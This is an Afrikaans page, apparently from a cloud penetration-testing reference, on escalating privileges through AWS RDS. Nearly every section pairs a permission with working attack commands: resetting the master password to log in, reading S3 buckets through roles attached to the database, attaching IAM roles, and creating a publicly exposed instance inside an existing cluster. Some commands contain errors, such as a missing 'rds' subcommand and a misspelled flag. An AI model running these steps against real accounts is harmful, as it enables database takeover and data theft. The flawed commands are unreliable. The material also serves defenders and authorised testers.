AWS - RDS Privesc

RDS - Relational Database Service

Vir meer inligting oor RDS, kyk:

rds:ModifyDBInstance

Met daardie toestemming kan 'n aanvaller die wagwoord van die meester gebruiker verander, en die aanmelding binne die databasis:

# Get the DB username, db name and address
aws rds describe-db-instances

# Modify the password and wait a couple of minutes
aws rds modify-db-instance \
--db-instance-identifier <db-id> \
--master-user-password 'Llaody2f6.123' \
--apply-immediately

# In case of postgres
psql postgresql://<username>:<pass>@<rds-dns>:5432/<db-name>

Potensiële Impak: Vind sensitiewe inligting binne die databasisse.

rds-db:connect

Volgens die dokumentasie kan 'n gebruiker met hierdie toestemming aan die DB-instantie koppel.

Misbruik RDS Rol IAM toestemmings

Postgresql (Aurora)

Eerstens kan jy kyk of hierdie databasis gebruik is om toegang tot enige ander AWS-diens te verkry. Jy kan dit nagaan deur na die geïnstalleerde uitbreidings te kyk:

SELECT * FROM pg_extension;

As jy iets soos aws_s3 vind, kan jy aanneem dat hierdie databasis 'n soort toegang oor S3 het (daar is ander uitbreidings soos aws_ml en aws_lambda).

As jy ook toestemmings het om aws rds describe-db-clusters uit te voer, kan jy daar sien of die kluster enige IAM Rol aangeheg het in die veld AssociatedRoles. As daar enige is, kan jy aanneem dat die databasis voorberei was om toegang tot ander AWS dienste te hê. Gebaseer op die naam van die rol (of as jy die toestemmings van die rol kan kry) kan jy raai watter ekstra toegang die databasis het.

Nou, om 'n lêer binne 'n emmer te lees, moet jy die volle pad weet. Jy kan dit lees met:

// Create table
CREATE TABLE ttemp (col TEXT);

// Create s3 uri
SELECT aws_commons.create_s3_uri(
'test1234567890678', // Name of the bucket
'data.csv',          // Name of the file
'eu-west-1'          //region of the bucket
) AS s3_uri \gset

// Load file contents in table
SELECT aws_s3.table_import_from_s3('ttemp', '', '(format text)',:'s3_uri');

// Get info
SELECT * from ttemp;

// Delete table
DROP TABLE ttemp;

As jy raw AWS credentials gehad het, kon jy dit ook gebruik om toegang tot S3-data te verkry met:

SELECT aws_s3.table_import_from_s3(
't', '', '(format csv)',
:'s3_uri',
aws_commons.create_aws_credentials('sample_access_key', 'sample_secret_key', '')
);

Mysql (Aurora)

Binne die mysql voer show variables; uit en as die veranderlikes soos aws_default_s3_role, aurora_load_from_s3_role, aurora_select_into_s3_role, waardes het, kan jy aanneem die databasis is voorberei om toegang tot S3 data te verkry.

Ook, as jy toestemmings het om aws rds describe-db-clusters uit te voer, kan jy nagaan of die kluster enige geassosieerde rol het, wat gewoonlik toegang tot AWS dienste beteken).

Nou, om 'n lêer binne 'n emmer te lees, moet jy die volle pad weet. Jy kan dit lees met:

CREATE TABLE ttemp (col TEXT);
LOAD DATA FROM S3 's3://mybucket/data.txt' INTO TABLE ttemp(col);
SELECT * FROM ttemp;
DROP TABLE ttemp;

rds:AddRoleToDBCluster, iam:PassRole

'n Aanvaller met die toestemmings rds:AddRoleToDBCluster en iam:PassRole kan 'n gespesifiseerde rol aan 'n bestaande RDS-instansie voeg. Dit kan die aanvaller in staat stel om toegang tot sensitiewe data te verkry of die data binne die instansie te wysig.

aws add-role-to-db-cluster --db-cluster-identifier <value> --role-arn <value>

Potensiële Impak: Toegang tot sensitiewe data of ongeoorloofde wysigings aan die data in die RDS-instantie. Let daarop dat sommige DB's addisionele konfigurasies vereis soos Mysql, wat die rol ARN in die parameter groepe moet spesifiseer.

rds:CreateDBInstance

Net met hierdie toestemming kan 'n aanvaller 'n nuwe instantie binne 'n kluster wat reeds bestaan en 'n IAM rol aangeheg het, skep. Hy sal nie in staat wees om die meester gebruikerswagwoord te verander nie, maar hy mag in staat wees om die nuwe databasisinstantie aan die internet bloot te stel:

aws --region eu-west-1 --profile none-priv rds create-db-instance \
--db-instance-identifier mydbinstance2 \
--db-instance-class db.t3.medium \
--engine aurora-postgresql \
--db-cluster-identifier database-1 \
--db-security-groups "string" \
--publicly-accessible

rds:CreateDBInstance, iam:PassRole

'n Aanvaller met die toestemmings rds:CreateDBInstance en iam:PassRole kan 'n nuwe RDS-instansie met 'n spesifieke rol aangeheg skep. Die aanvaller kan dan moontlik toegang tot sensitiewe data verkry of die data binne die instansie wysig.

aws rds create-db-instance --db-instance-identifier malicious-instance --db-instance-class db.t2.micro --engine mysql --allocated-storage 20 --master-username admin --master-user-password mypassword --db-name mydatabase --vapc-security-group-ids sg-12345678 --db-subnet-group-name mydbsubnetgroup --enable-iam-database-authentication --custom-iam-instance-profile arn:aws:iam::123456789012:role/MyRDSEnabledRole

Potensiële Impak: Toegang tot sensitiewe data of ongeoorloofde wysigings aan die data in die RDS-instantie.

rds:AddRoleToDBInstance, iam:PassRole

'n Aanvaller met die toestemmings rds:AddRoleToDBInstance en iam:PassRole kan 'n gespesifiseerde rol aan 'n bestaande RDS-instantie voeg. Dit kan die aanvaller in staat stel om toegang tot sensitiewe data te verkry of die data binne die instantie te wysig.

aws rds add-role-to-db-instance --db-instance-identifier target-instance --role-arn arn:aws:iam::123456789012:role/MyRDSEnabledRole --feature-name <feat-name>

Potensiële Impak: Toegang tot sensitiewe data of ongeoorloofde wysigings aan die data in die RDS-instantie.